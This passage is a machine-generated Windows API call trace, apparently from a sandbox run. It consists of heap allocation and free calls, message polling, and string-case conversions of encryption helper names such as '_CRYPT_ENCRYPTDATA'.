Flags=0x0, Size=0xd257) returned 0x955018 [0033.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0033.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0033.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0033.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0033.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0033.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0033.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd257) returned 0x962278 [0033.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0033.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.391] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0033.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0033.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd257) returned 0x955018 [0033.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0033.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0033.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0033.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.392] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0033.392] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0033.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.393] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0033.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0033.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0033.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0033.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0033.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0033.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd257) returned 0x955018 [0033.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0033.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0033.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0033.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3b8 [0033.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0033.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0033.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da408 [0033.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0033.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0033.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0033.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbe0 [0033.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0033.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0033.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0033.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0033.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd257) returned 0x96f4d8 [0033.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0033.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0033.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0033.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0033.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0033.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0033.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0033.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0033.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0033.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0033.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0033.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0033.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0033.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0033.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0033.395] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0033.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0033.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0033.395] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0033.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0033.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0033.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0033.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0033.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0033.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0033.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0033.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0033.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0033.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0033.395] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0033.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0033.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0033.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da238 [0033.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0033.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0033.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0033.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0033.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc28 [0033.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0033.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0033.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0033.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0033.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0033.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0033.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0033.396] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0033.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0033.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0033.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0033.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0033.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0033.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0033.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0033.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0033.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0033.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0033.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0033.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0033.396] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0033.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0033.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0033.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0033.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0033.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0033.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0033.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0033.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0033.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0033.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0033.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0033.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0033.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0033.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0033.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0033.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0033.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0033.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0033.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0033.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.397] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0033.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0033.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0033.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0033.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0033.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0033.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0033.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0033.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0033.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0033.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0033.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0033.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0033.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0033.398] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0033.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0033.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0033.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0033.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0033.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0033.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0033.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0033.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.398] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0033.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cca0 [0033.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0033.398] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0033.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0033.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0033.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0033.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0033.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0033.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0033.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0033.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0033.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0033.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0033.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0033.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0033.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0033.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0033.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0033.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0033.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0033.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0033.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0033.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0033.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0033.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0033.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0033.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0033.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0033.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0033.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0033.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0033.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0033.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0033.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0033.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0033.400] 